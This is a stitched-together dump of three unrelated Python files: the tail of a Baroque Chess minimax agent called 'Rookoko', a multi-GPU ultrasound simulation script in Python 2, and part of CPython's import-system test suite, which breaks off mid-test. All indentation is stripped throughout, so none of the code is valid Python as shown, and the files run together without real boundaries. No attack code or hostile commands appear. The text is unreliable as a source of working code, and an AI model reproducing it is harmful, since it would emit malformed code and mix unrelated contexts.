best_score, best_move = minimax_move_finder(board, zhash, whose_move, ply, math.inf)
except threading.ThreadError:
return
def minimax_move_finder(board, zhash, whoseMove, ply_remaining, end_time, alpha=-math.inf, beta=math.inf):
global ZOB_STATES, TIME_INC, DYN_VALS, EVAL_THREAD, EVAL_THREAD_EXIT, STATISTICS
if EVAL_THREAD and EVAL_THREAD_EXIT:
raise threading.ThreadError
if zhash in DYN_VALS:
STATISTICS["Z_SUCCESS"] += 1
dyn_ret, dyn_ply = DYN_VALS[zhash]
if dyn_ply >= ply_remaining:
return dyn_ret
else:
STATISTICS["Z_QUERIES"] += 1
# Check if a win state
win_state = is_win_state(board)
if win_state:
STATISTICS["Z_QUERIES"] += 1
if zhash not in ZOB_STATES:
ZOB_STATES[zhash] = win_state
DYN_VALS[zhash] = ((win_state, None), math.inf)
else:
STATISTICS["Z_SUCCESS"] += 1
return win_state, None
successor_boards = generate_successors(board, zhash, whoseMove)
if ply_remaining <= 0 or len(successor_boards) == 0:
STATISTICS["Z_QUERIES"] += 1
if zhash not in ZOB_STATES:
STATISTICS["STATIC_EVALS"] += 1
ZOB_STATES[zhash] = static_eval(board)
DYN_VALS[zhash] = ((ZOB_STATES[zhash], None), 0)
else:
STATISTICS["Z_SUCCESS"] += 1
return ZOB_STATES[zhash], None
next_player = 1 - whoseMove
chance = 1/2
best_score = math.inf
if whoseMove == WHITE: # White is the maximizing player
best_score = -math.inf
attached_move_and_state = None
# Loop through all possible successor board states
for s_move, s_board, s_hash in successor_boards:
# Check that there is time to deepen, if not, exit
if time.time() >= end_time:
return best_score, None
# Stop searching if alpha-beta pruning conditions met
if alpha >= beta:
STATISTICS["AB_CUTOFFS"] += 1
return best_score, attached_move_and_state
result = minimax_move_finder(s_board, s_hash, next_player, ply_remaining - 1, end_time - TIME_INC, alpha, beta)
s_score = result[0]
if (whoseMove == WHITE and s_score > best_score) \
or (whoseMove == BLACK and s_score < best_score)\
or (s_score == best_score and random.random() <= chance):
best_score = s_score
attached_move_and_state = (s_move, s_board)
# Update alpha and beta
if whoseMove == WHITE:
alpha = max(alpha, best_score)
elif whoseMove == BLACK:
beta = min(beta, best_score)
DYN_VALS[zhash] = ((best_score, attached_move_and_state), ply_remaining)
return best_score, attached_move_and_state
# Checks if current board state is a win state (no king)
def is_win_state(board):
pieces = set((p for row in board for p in row))
if WHITE_KING not in pieces:
return -math.inf
elif BLACK_KING not in pieces:
return math.inf
else:
return 0
# Generates successors from input board by finding all possible moves
def generate_successors(board, zhash, whoseMove):
global PIECES, EMPTY, LEAPER_CAPTURE
successors = []
movablePieces = PIECES[whoseMove]
opponentPieces = PIECES[1 - whoseMove]
# Only calculate moves for now, not captures
potentials = set(((row,col) for row in range(8) for col in range(8) if board[row][col] in movablePieces))
for row,col in potentials:
LEAPER_CAPTURE = []
piece = board[row][col]
neighborhood = get_neighborhood(row, col)
# Check for freezers
neighbors = set((board[r][c] for (r,c) in neighborhood))
if (whoseMove == WHITE and BLACK_FREEZER in neighbors)\
or (whoseMove == BLACK and WHITE_FREEZER in neighbors):
# Pieces that have been frozen cannot move.
continue
# If your imitator can capture a king,
# there's no reason to take any other move.
elif (WHITE_KING in neighbors and piece == BLACK_IMITATOR) or\
(BLACK_KING in neighbors and piece == WHITE_IMITATOR):
for (new_r,new_c) in neighborhood:
if (piece == BLACK_IMITATOR and board[new_r][new_c] == WHITE_KING) or\
(piece == WHITE_IMITATOR and board[new_r][new_c] == BLACK_KING):
successors = [apply_move(board, zhash, row, col, new_r, new_c)]
break
# Pincers and kings have special movement rules.
# All other pieces move like standard-chess queens.
elif piece == BLACK_KING or piece == WHITE_KING:
for (new_r,new_c) in neighborhood:
if board[new_r][new_c] == EMPTY or board[new_r][new_c] in opponentPieces:
successors.append(apply_move(board, zhash, row, col, new_r, new_c))
else:
possible_spaces = []
directions = [(0,1), (1,0), (-1,0), (0,-1),\
(1,1), (1,-1), (-1,1), (-1,-1)]
if piece == BLACK_PINCER or piece == WHITE_PINCER:
directions = [(0,1), (1,0), (-1,0), (0,-1)]
for (dr,dc) in directions:
(new_r, new_c) = (row+dr, col+dc)
while valid_space(new_r, new_c) and\
board[new_r][new_c] == EMPTY:
possible_spaces.append((new_r, new_c))
new_r += dr
new_c += dc
# Leapers can leap (and imitators can leap over leapers)
# The 'leapee' should be at board[new_r][new_c]
if valid_space(new_r + dr, new_c + dc) and (board[new_r + dr][new_c + dc] == EMPTY):
target = board[new_r][new_c]
if target in opponentPieces and\
(piece == BLACK_LEAPER or piece == WHITE_LEAPER or\
(piece == BLACK_IMITATOR and target == WHITE_LEAPER) or\
(piece == WHITE_IMITATOR and target == BLACK_LEAPER)):
LEAPER_CAPTURE.append([(row, col),(new_r + dr, new_c + dc)])
possible_spaces.append((new_r + dr, new_c + dc))
for (new_r, new_c) in possible_spaces:
# Apply move to board
new_move, new_board, new_hash = apply_move(board, zhash, row, col, new_r, new_c)
# Apply any captures to board
new_boards = apply_captures(new_board, new_hash, row, col, new_r, new_c,\
piece, opponentPieces, whoseMove)
successors.extend(((new_move, b[0], b[1]) for b in new_boards))
return successors
def valid_space(row, col):
# Returns whether the given coordinates fall within the boundaries of the board
return (0 <= row <= 7) and (0 <= col <= 7)
def apply_captures(board, zhash, old_r, old_c, new_r, new_c, piece, capturablePieces, whoseMove):
global LEAPER_CAPTURE, ZOB_TBL, EMPTY
# Looks for all possible captures, and then applies them, returning a list of new board states
# Fast and mysterious way to make dr and dc either 1, 0, or -1
(dr, dc) = ((old_r < new_r) - (old_r > new_r),\
(old_c < new_c) - (old_c > new_c))
# Fast and mysterious way to get the piece 'type', in terms of its black-piece equivalent
piece_type = (piece >> 1) << 1
# Leapers capture by 'leaping over' opposing pieces
# Leaper captures must be handled specially, because moving without capture is not acceptable.
# Note that this will also handle the case of imitators imitating leapers
if [(old_r, old_c), (new_r, new_c)] in LEAPER_CAPTURE:
# The space 'behind' the leaper's final position will already have been checked above
LEAPER_CAPTURE.remove([(old_r, old_c), (new_r, new_c)])
if board[new_r - dr][new_c - dc] in capturablePieces:
new_board = copy_board(board)
new_board[new_r - dr][new_c - dc] = EMPTY
new_hash = zhash ^ ZOB_TBL[(new_r - dr, new_c - dc, board[new_r - dr][new_c - dc])]
return [(new_board, new_hash)]
# We will assume that moving without capturing is not considered acceptable
boards = []
#boards = [(board, zhash)]
# Imitators capture by 'imitating' the piece to be captured
if piece_type == BLACK_IMITATOR:
# Imitators cannot imitate freezers or other imitators.
# They can imitate kings and leapers; however, those are already handled above.
if dr != 0 and dc != 0:
# Imitators cannot imitate pincers when moving diagonally
possiblePieces = set((whoseMove+BLACK_COORDINATOR,\
whoseMove+BLACK_WITHDRAWER))
else:
possiblePieces = set((whoseMove+BLACK_PINCER,\
whoseMove+BLACK_COORDINATOR,\
whoseMove+BLACK_WITHDRAWER))
# whoseMove is 0 for black and 1 for white.
# So, (BLACK_X + whoseMove) returns a black X if whoseMove is BLACK,
# and a white X if whoseMove is WHITE.
for otherPiece in possiblePieces:
# Note that capturablePieces below consists solely of
# the opposing counterpart to otherPiece
possibleBoards = apply_captures(board, zhash, old_r, old_c, new_r, new_c,\
otherPiece, [otherPiece ^ 1], whoseMove)
boards.extend(possibleBoards)
# Pincers capture by 'surrounding' opposing pieces
# NOTE: according to the spec, pincers can pinch using ANY friendly piece
# (not just other pincers)
elif piece_type == BLACK_PINCER:
directions = [(0,1), (1,0), (-1,0), (0,-1)]
new_board = copy_board(board)
new_hash = zhash
for (drow, dcol) in directions:
if valid_space(new_r + drow*2, new_c + dcol*2)\
and board[new_r+drow][new_c+dcol] in capturablePieces\
and board[new_r+drow*2][new_c+dcol*2] != EMPTY\
and who(board[new_r+drow*2][new_c+dcol*2]) == whoseMove:
new_board[new_r+drow][new_c+dcol] = EMPTY
new_hash = zhash ^ ZOB_TBL[(new_r+drow, new_c+dcol, board[new_r+drow][new_c+dcol])]
if new_hash != zhash:
boards.append((new_board, new_hash))
# Coordinators capture by 'coordinating' with the king
elif piece_type == BLACK_COORDINATOR:
(king_r, king_c) = friendly_king_position(board, whoseMove)
# Check the two spaces that the king and coordinator 'coordinate' together
new_board = copy_board(board)
new_hash = zhash
for (r,c) in [(new_r,king_c), (king_r,new_c)]:
if board[r][c] in capturablePieces:
new_board[r][c] = EMPTY
new_hash = zhash ^ ZOB_TBL[(r,c,board[r][c])]
if new_hash != zhash:
boards.append((new_board, new_hash))
# Withdrawers capture by 'withdrawing' from an opposing piece
elif piece_type == BLACK_WITHDRAWER:
# Check the space 'behind' the withdrawer
if valid_space(old_r - dr, old_c - dc)\
and board[old_r - dr][old_c - dc] in capturablePieces:
new_board = copy_board(board)
new_board[old_r - dr][old_c - dc] = EMPTY
new_hash = zhash ^ ZOB_TBL[(old_r-dr,old_c-dc,board[old_r-dr][old_c-dc])]
boards.append((new_board, new_hash))
if boards == []:
boards = [(board, zhash)]
return boards
def apply_move(board, zhash, old_r, old_c, new_r, new_c):
global ZOB_TBL, EMPTY
# Returns a tuple containing the given move followed by a copy of
# the given board with the result of a piece's (non-capturing) move
new_hash = zhash
new_hash ^= ZOB_TBL[(new_r, new_c, board[new_r][new_c])]
new_hash ^= ZOB_TBL[(old_r, old_c, board[old_r][old_c])]
new_hash ^= ZOB_TBL[(new_r, new_c, board[old_r][old_c])]
new_board = copy_board(board)
new_board[new_r][new_c] = new_board[old_r][old_c]
new_board[old_r][old_c] = EMPTY
return ((old_r, old_c),(new_r, new_c)), new_board, new_hash
def get_neighborhood(row, col):
# Returns a list of coordinates of the 8 spaces surrounding a given square.
# For an edge, only 5 spaces will be returned; for a corner, only 3.
spaces = [(r, c)\
for r in range(max(0,row-1), min(8,row+2))\
for c in range(max(0,col-1), min(8,col+2))\
if not (r == row and c == col)]
return spaces
def copy_board(board):
# Returns a deep copy of a given board.
return [[board[r][c] for c in range(len(board[0]))] for r in range(len(board))]
def friendly_king_position(board, whoseMove):
king = BLACK_KING ^ whoseMove
for row in range(len(board)):
for col in range(len(board[0])):
if board[row][col] == king:
return row,col
return None # Something has gone terribly wrong here
def nickname():
return "Rookoko"
def introduce():
return "I'm Rookoko, an exuberant Baroque Chess agent."
def prepare(player2Nickname):
global ZOB_TBL, ZOB_STATES, PIECES, EMPTY, TURNS, STATIC_BOARD, DYN_VALS, PUN_GENERATOR
TURNS = 0
STATIC_BOARD = dict()
PUN_GENERATOR = pun_generator()
for r in range(8):
for c in range(8):
#print(int(pos_val(r,c)*10)/10, end=' ')
for key in STATIC_VALUES.keys():
if key == EMPTY:
STATIC_BOARD[(r,c,key)] = (r-3.5)//2
else:
STATIC_BOARD[(r,c,key)] = pos_val(r,c)*(2*who(key)-1)*STATIC_VALUES[key]
#print()
# Set up Zobrist hashing - Assuming default board size 8 x 8
for row in range(8):
for col in range(8):
# Don't bother with a hash for the empty space
ZOB_TBL[(row, col, EMPTY)] = 0
for player in (BLACK, WHITE):
for piece in PIECES[player]:
ZOB_TBL[(row, col, piece)] = random.getrandbits(64)
return "Ready to rumble!"
# Get hash value, do bit-wise XOR
def zob_hash(board):
global ZOB_TBL, EMPTY
hash_val = 0
for row in range(8):
for col in range(8):
if board[row][col] != EMPTY:
hash_val ^= ZOB_TBL[(row, col, board[row][col])]
return hash_val
|
demo_multi_gpu.py
|
import threading
import time
from linear_scan_phantom import do_simulation
import argparse
class Dummy:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("h5_file", help="Phantom to scan")
parser.add_argument("num_devices", help="Number of GPUs to use", type=int)
parser.add_argument("--save_pdf", action="store_true")
args = parser.parse_args()
start_time = time.time()
# spawn one thread for each GPU
threads = []
for device_no in range(args.num_devices):
# set up common parameters for each GPU
params = Dummy()
params.h5_file = args.h5_file
params.x0 = -3e-2
params.x1 = 3e-2
params.num_lines = 512
params.num_frames = 1
params.visualize = False
params.use_gpu = True
params.save_simdata_file = ""
params.noise_ampl = 0
# specific parameters
if args.save_pdf:
params.pdf_file = "Res_GPU_device_%d.pdf" % device_no
else:
params.pdf_file = ""
params.device_no = device_no
t = threading.Thread(target=do_simulation, args=(params,))
t.start()
threads.append(t)
print "Waiting for all threads to finish...",
for thread in threads:
thread.join()
print "Done."
end_time = time.time()
elapsed_time = end_time-start_time
print "Total time elapsed: %f sec." % elapsed_time
print "Time per device: %f sec" % (elapsed_time/args.num_devices)
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import shutil
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError):
from test_from_import_AttributeError import does_not_exist
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
def delay_has_deadlock(frame, event, arg):
if event == 'call' and frame.f_code.co_name == 'has_deadlock':
time.sleep(0.05)
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
sys.settrace(delay_has_deadlock)
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
sys.settrace(None)
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(12)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
